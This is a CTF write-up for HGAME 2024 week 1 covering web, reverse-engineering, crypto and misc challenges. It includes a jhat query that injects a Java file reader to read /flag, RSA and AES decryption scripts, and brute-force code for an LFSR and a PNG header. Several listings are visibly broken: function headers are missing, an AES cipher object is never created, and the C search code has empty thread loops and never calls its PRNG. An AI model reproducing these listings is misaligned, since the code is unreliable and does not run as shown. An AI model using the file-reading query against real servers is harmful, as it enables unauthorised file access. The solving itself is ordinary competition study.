# HGAME 2024 WEEK1 WP


### WEB

#### Select Courses

按理说 full 应该一直是 1；但如果我在左边（请求）故意构造几次让右边（响应）返回 400 的包，再发正常的包，并多次重复这个步骤，full 就莫名其妙变成 0 了。

（例如下面这张图期间发了1次id=4+4,id=441，发了3次id=4）

#### jhat

select new java.io.BufferedReader(new java.io.InputStreamReader(new java.io.FileInputStream("/flag"))).readLine()

### RE

#### ezPYC

# Integer table as listed in the write-up for ezPYC (38 values).
flag = [
    87, 75, 71, 69, 83, 121, 83, 125, 117, 106,
    108, 106, 94, 80, 48, 114, 100, 112, 112, 55,
    94, 51, 112, 91, 48, 108, 119, 97, 115, 49,
    112, 112, 48, 108, 100, 37, 124, 2,
]
# Four-element list that follows the table in the write-up.
c = [1, 2, 3, 4]
# (the rest of the script is omitted by the author)


#### ezUPX

upx -d ezUPX

xor 0x32

VIDAR{Wow!Y0u_kn0w_4_l1ttl3_0f_UPX!}

IDA直接打开就能看到

nc即可

### CRYPTO

#### 奇怪的图片

import time

from PIL import Image, ImageDraw, ImageFont
import random
import secrets

# Placeholder value in the published source; presumably the real flag took its
# place when the challenge images were generated.
flag = "hgame{fake_flag}"

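# Generate a random RGB image
def generate_random_image(width, height):
    """Return a ``width`` x ``height`` RGB image filled with random pixels.

    Each channel of each pixel is drawn with ``random.randint(0, 255)``,
    column by column.

    NOTE(review): ``random`` is a Mersenne Twister, not a CSPRNG. This script
    also uses this function to build ``key_image``; an image that acts as an
    XOR key should be filled from ``secrets`` (already imported) instead.
    """
    image = Image.new("RGB", (width, height), "white")
    # The listing assigned to ``pixels`` without ever binding it (NameError).
    # load() returns the pixel-access object, so writes land in ``image``.
    pixels = image.load()
    for x in range(width):
        for y in range(height):
            red = random.randint(0, 255)
            green = random.randint(0, 255)
            blue = random.randint(0, 255)
            pixels[x, y] = (red, green, blue)
    return image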

# Draw flag text onto the image
def draw_text(image, width, height, token):
    """Render ``token`` on ``image`` at a random spot and return the image.

    Font size (16-40), colour and position are all random. The position is
    chosen so that a box of ``font_size * len(token)`` by ``font_size`` fits
    inside ``width`` x ``height``. The image is modified in place.
    """
    size = random.randint(16, 40)
    typeface = ImageFont.truetype("arial.ttf", size)
    # Three draws in R, G, B order, same as the original tuple literal.
    colour = tuple(random.randint(0, 255) for _ in range(3))
    left = random.randint(0, width - size * len(token))
    top = random.randint(0, height - size)
    ImageDraw.Draw(image).text((left, top), token, font=typeface, fill=colour)
    return image

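# XOR the RGB values of two images
def xor_images(image1, image2):
    """Return a new RGB image whose pixels are ``image1 XOR image2``.

    Each of the three channels is XORed independently, pixel by pixel.

    Raises:
        ValueError: if the two images do not have the same size.
    """
    if image1.size != image2.size:
        raise ValueError("Images must have the same dimensions.")
    xor_image = Image.new("RGB", image1.size)
    # The listing used these three names without binding them (NameError);
    # each is the pixel-access object of the corresponding image.
    pixels1 = image1.load()
    pixels2 = image2.load()
    xor_pixels = xor_image.load()
    for x in range(image1.size[0]):
        for y in range(image1.size[1]):
            r1, g1, b1 = pixels1[x, y]
            r2, g2, b2 = pixels2[x, y]
            xor_pixels[x, y] = (r1 ^ r2, g1 ^ g2, b1 ^ b2)
    return xor_image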

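# Generate unique random tokens to use as file names
def generate_unique_strings(n, length):
    """Return ``n`` distinct random hex strings as a list.

    Each string comes from ``secrets.token_hex(length // 2)``, so it is
    ``2 * (length // 2)`` characters long (``length`` itself when even).

    Raises:
        ValueError: if ``n`` is larger than the number of distinct strings of
            that size, a request that could never be satisfied.
    """
    nbytes = length // 2
    if n > 256 ** nbytes:
        raise ValueError("cannot build that many distinct strings of this length")
    unique_strings = set()
    while len(unique_strings) < n:
        random_string = secrets.token_hex(nbytes)
        # The listing never stored the token, so the loop could not terminate.
        unique_strings.add(random_string)
    return list(unique_strings)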

# One 8-character hex name per flag character.
random_strings = generate_unique_strings(len(flag), 8)

# Two independent 120x80 noise images: the canvas that receives the text, and
# the image named as the key.
current_image, key_image = (
    generate_random_image(120, 80),
    generate_random_image(120, 80),
)

def random_time(image, name):
    """Wait a random fraction of a second, then save ``image`` as a PNG.

    The file goes to ``.\\png_out\\<name>.png`` (Windows-style relative path).
    The random delay presumably decouples file timestamps from the order in
    which the images were produced.
    """
    delay = random.random()
    time.sleep(delay)
    out_path = ".\\png_out\\{}.png".format(name)
    image.save(out_path)

# Draw the flag one character per pass onto the same canvas, so every pass adds
# one more glyph on top of what the earlier passes left there.
# NOTE(review): random_time, key_image and random_strings are defined above but
# unused in the visible loop; the step that XORs each frame with key_image and
# saves it appears to be missing from this listing.
for i, glyph in enumerate(flag):
    current_image = draw_text(current_image, 120, 80, glyph)


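设 key 为密钥图，a1、b1 为任意两张画了 flag 字符的原图，a2、b2 为对应的输出图：

key ^ a1 = a2
key ^ b1 = b2

所有输出都用了同一张 key，所以把两式异或后 key 被消去：

a2 ^ b2 = a1 ^ b1

也就是说，任意两张输出图异或后只剩下两张原图之间的差异（即两者之间新画上去的字符），不需要知道 key。这就是密钥重用（two-time pad）问题：同一个异或密钥不能用于多份明文。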

from PIL import Image, ImageDraw, ImageFont

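def xor_images(image1, image2):
    """Return a new RGB image whose pixels are ``image1 XOR image2``.

    Each of the three channels is XORed independently, pixel by pixel.

    Raises:
        ValueError: if the two images do not have the same size.
    """
    if image1.size != image2.size:
        raise ValueError("Images must have the same dimensions.")
    xor_image = Image.new("RGB", image1.size)
    # The listing used these three names without binding them (NameError);
    # each is the pixel-access object of the corresponding image.
    pixels1 = image1.load()
    pixels2 = image2.load()
    xor_pixels = xor_image.load()
    for x in range(image1.size[0]):
        for y in range(image1.size[1]):
            r1, g1, b1 = pixels1[x, y]
            r2, g2, b2 = pixels2[x, y]
            xor_pixels[x, y] = (r1 ^ r2, g1 ^ g2, b1 ^ b2)
    return xor_image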

import os
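# Collect the PNG files in the working directory. Match on the extension
# rather than on ".png" appearing anywhere in the name.
DL = os.listdir('./')
NDL = [file for file in DL if file.endswith(".png")]
print(NDL)
print(len(NDL))

# XOR every image with every image. Pair (j, i) is written to
# ../<name of image j>/<i>.png, where i is the index into NDL.
for j, left_name in enumerate(NDL):
    dr = os.path.splitext(left_name)[0]
    # exist_ok lets the script be re-run without failing on existing folders.
    os.makedirs(f'../{dr}', exist_ok=True)
    # The listing never closed image1; the context managers release both
    # input files even when a later step raises.
    with Image.open(left_name) as image1:
        for i, right_name in enumerate(NDL):
            with Image.open(right_name) as image2:
                image3 = xor_images(image1, image2)
            image3.save(f'../{dr}/{i}.png')
            image3.close()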


#### ezRSA

# The two hint values of the challenge.
# Assuming p and q are distinct primes and n = p*q: p^q is 0 mod p and, by
# Fermat's little theorem, p^q is p mod q. The only residue below n that meets
# both conditions is p itself, so leak1 == p and, symmetrically, leak2 == q.
# Publishing these values therefore discloses the factorisation of n.
leak1, leak2 = pow(p, q, n), pow(q, p, n)


import gmpy2
import binascii

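e = 65537
# Prime factors of the modulus and the ciphertext, as given in the write-up.
p = 149127170073611271968182576751290331559018441805725310426095412837589227670757540743929865853650399839102838431507200744724939659463200158012469676979987696419050900842798225665861812331113632892438742724202916416060266581590169063867688299288985734104127632232175657352697898383441323477450658179727728908669
q = 116122992714670915381309916967490436489020001172880644167179915467021794892927977272080596641785569119134259037522388335198043152206150259103485574558816424740204736215551933482583941959994625356581201054534529395781744338631021423703171146456663432955843598548122593308782245220792018716508538497402576709461
c = 10529481867532520034258056773864074017027019578041866245400647840230251661652999709715919620810933437191661180003295923273655675729588558899592524235622728816065501918076120812236580344991140980991532347991252705288633014913479970610056845543523591324177567061948922552275235486615514913932125436543991642607028689762693617305246716492783116813070355512606971626645594961850567586340389705821314842096465631886812281289843132258131809773797777049358789182212570606252509790830994263132020094153646296793522975632191912463919898988349282284972919932761952603379733234575351624039162440021940592552768579639977713099971
n = p * q

# Euler's totient of n for two distinct primes; d is the inverse of e modulo it.
L = (p - 1) * (q - 1)
d = gmpy2.invert(e, L)
m = gmpy2.powmod(c, d, n)

# hex() followed by unhexlify() raises when the hex string has an odd number
# of digits (plaintext whose top nibble is zero); int.to_bytes has no such
# restriction and gives the same bytes otherwise.
m_int = int(m)
print(m_int.to_bytes((m_int.bit_length() + 7) // 8, "big"))
# Output reported in the write-up:
#hgame{F3rmat_l1tt1e_the0rem_is_th3_bas1s}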


#### ezMath

https://www.wxjk.net/other/23395136.html

#sage
# Upper bound on how many continued-fraction convergents are examined.
numTry = 1500


def solve_pell(N, numTry):
    """Search the convergents of sqrt(N) for a solution of x^2 - N*y^2 = 1.

    Walks the first ``numTry`` convergents of the continued fraction of
    ``sqrt(N)`` and returns ``(numerator, denominator)`` of the first one that
    satisfies the equation, or ``(None, None)`` when none of them does.
    """
    cf = continued_fraction(sqrt(N))
    for k in range(numTry):
        numer, denom = cf.numerator(k), cf.denominator(k)
        # In Sage, ^ is exponentiation (the preparser rewrites it), not XOR.
        if numer^2 - N * denom^2 != 1:
            continue
        return numer, denom
    return None, None


x, y = solve_pell(114514, numTry)
print(y)


9037815138660369922198555785216162916412331641365948545459353586895717702576049626533527779108680


from Crypto.Cipher import AES
from libnum import n2s as long_to_bytes
# NOTE(review): the ``def`` line that owns this return is missing from the
# listing. The expression appends 16 - len(x) % 16 zero bytes, so an input
# whose length is already a multiple of 16 gains one full extra block. Unlike
# PKCS#7, zero padding cannot be stripped unambiguously when the data itself
# may end in zero bytes.
return x+b'\x00'*(16-len(x)%16)
# Same integer as the Pell-equation result shown earlier in the write-up.
y = 9037815138660369922198555785216162916412331641365948545459353586895717702576049626533527779108680

# Big-endian byte string of y, used as the key material.
key_bytes = long_to_bytes(y)

# Ciphertext bytes given by the challenge.
enc = b"\xce\xf1\x94\x84\xe9m\x88\x04\xcb\x9ad\x9e\x08b\xbf\x8b\xd3\r\xe2\x81\x17g\x9c\xd7\x10\x19\x1a\xa6\xc3\x9d\xde\xe7\xe0h\xed/\x00\x95tz)1\\\t8:\xb1,U\xfe\xdec\xf2h\xab\xe5'\x93\xf8\xde\xb2\x9a\x9a"

# NOTE(review): ``cipher`` is never constructed in this listing. The line that
# builds the AES object from key_bytes (key length and mode) was lost, so the
# snippet does not run as shown.
decrypted_flag = cipher.decrypt(enc)

print(decrypted_flag)
# Output reported by the author. The 16 trailing \x00 bytes are what the zero
# padding above adds to a 48-byte plaintext.
#b'hgame{G0od!_Yo3_k1ow_C0ntinued_Fra3ti0ns!!!!!!!}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'


#### ezPRNG

c语言多线程爆破(爆破完约6小时，针对此题耗时约2小时)

#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define SEARCH_SPACE 4294967295U

/*
 * One step of a 32-bit linear-feedback shift register.
 *
 * The state R is shifted left by one bit and the parity of the tapped bits
 * (R & mask) becomes the new least-significant bit. Returns the next state.
 * The whole state is 32 bits, so the seed space is at most 2^32 values.
 */
uint32_t PRNG(uint32_t R, uint32_t mask) {
    uint32_t tapped = R & mask;
    uint32_t parity = 0;

    /* Fold the tapped bits together one at a time, lowest bit first. */
    for (; tapped != 0; tapped >>= 1) {
        parity ^= tapped & 1u;
    }

    /* Bit 0 of the shifted state is always clear, so XOR just sets it. */
    return (uint32_t)(R << 1) ^ parity;
}

/* The four target bit strings; the search code below compares a candidate's
 * output against each of them over 70 characters. */
char* outputs[4] = {
"1111110110111011110000101011010001000111111001111110100101000011110111",
"0010000000001010111100001100011101111101111000100100111010101110010110",
"1110110110010001011100111110111110111001111101010011001111100100001000",
"0001101010101010100001001001100010000101010100001010001000100011101100"
};
/* Scratch string for one candidate: 70 characters plus the terminating NUL.
 * NOTE(review): this array has file scope. If the search code runs on several
 * threads, as the write-up says, they would all write to this one buffer;
 * confirm that each thread has its own copy. */
char buffer[71];

/* NOTE(review): the function header that owns this body is missing from the
 * listing, and start, end and mask are not declared anywhere in view. The
 * closing `return NULL;` suggests a pthread-style worker; confirm. */
/* One pass per target string in outputs[]. */
for (int i = 0; i < 4; i++) {
/* NOTE(review): R is a uint32_t, so if end equals 0xFFFFFFFF (SEARCH_SPACE)
 * the condition R <= end is always true and R wraps around instead of
 * stopping. */
for (uint32_t R = start; R <= end; R++) {
uint32_t currentR = R;
/* Build the candidate's 70-character bit string.
 * NOTE(review): currentR is never advanced inside this loop as listed, so all
 * 70 characters are the same bit; the call to PRNG() was presumably lost. */
for (int j = 0; j < 70; j++) {
buffer[j] = (currentR & 1) + '0';
}
buffer[70] = '\0';

/* NOTE(review): a match leaves the inner search without reporting R; the
 * output statement was presumably lost from the listing. */
if (strncmp(buffer, outputs[i], 70) == 0) {
break;
}
/* Progress line every 100,000,000 candidates. */
if (R % 100000000 == 0) {
printf("Progress: %u\n", R);}
}
}

return NULL;
}

/* Entry point: two loops over NUM_THREADS, then a completion message.
 * NOTE(review): both loop bodies are empty in this listing and NUM_THREADS is
 * not defined in view; the thread creation and join calls were presumably
 * lost. */
int main() {

for (int i = 0; i < NUM_THREADS; i++) {
}

for (int i = 0; i < NUM_THREADS; i++) {
}

printf("Search completed.\n");
return 0;
}


### MISC

#### SignIn

hgame{WOW_GREAT_YOU_SEE_IT_WONDERFUL}


#### 希儿希儿希尔

import binascii
import struct
import sys
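file = input("图片地址：")
# Read the whole image once; the listing used ``fr`` without ever binding it.
with open(file, 'rb') as src:
    fr = src.read()
if len(fr) < 0x21:
    sys.exit("input is too short to contain a PNG IHDR chunk")

# Bytes 0x0c-0x1c: the IHDR chunk type followed by its 13 data bytes, which is
# exactly the range the chunk CRC covers.
data: bytearray = bytearray(fr[0x0c:0x1d])
# Bytes 0x1d-0x20: the CRC-32 stored for IHDR, big-endian. Parsed directly
# rather than through eval() on a string built from file contents.
crc32key = int.from_bytes(fr[0x1d:0x21], 'big')
n = 4095

# Try every width/height pair below n until the recomputed CRC matches the
# stored one. Width sits at offset 4 and height at offset 8 of ``data``.
found = False
for w in range(n):
    width = bytearray(struct.pack('>i', w))
    data[4:8] = width
    for h in range(n):
        height = bytearray(struct.pack('>i', h))
        data[8:12] = height
        crc32result = binascii.crc32(data) & 0xffffffff
        if crc32result == crc32key:
            found = True
            break
    if found:
        break

if found:
    print(width,height)
    # In the file itself the same two fields live at offsets 16 and 20.
    newpic = bytearray(fr)
    newpic[16:20] = width
    newpic[20:24] = height
    # The listing wrote ``fw.close`` without calling it and then called
    # close() on the path string; the context manager closes the file.
    with open(file+'.png','wb') as fw:
        fw.write(newpic)
else:
    print("no width/height below", n, "matches the stored IHDR CRC", file=sys.stderr)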


hgame{DISAPPEARINTHESEAOFBUTTERFLY}
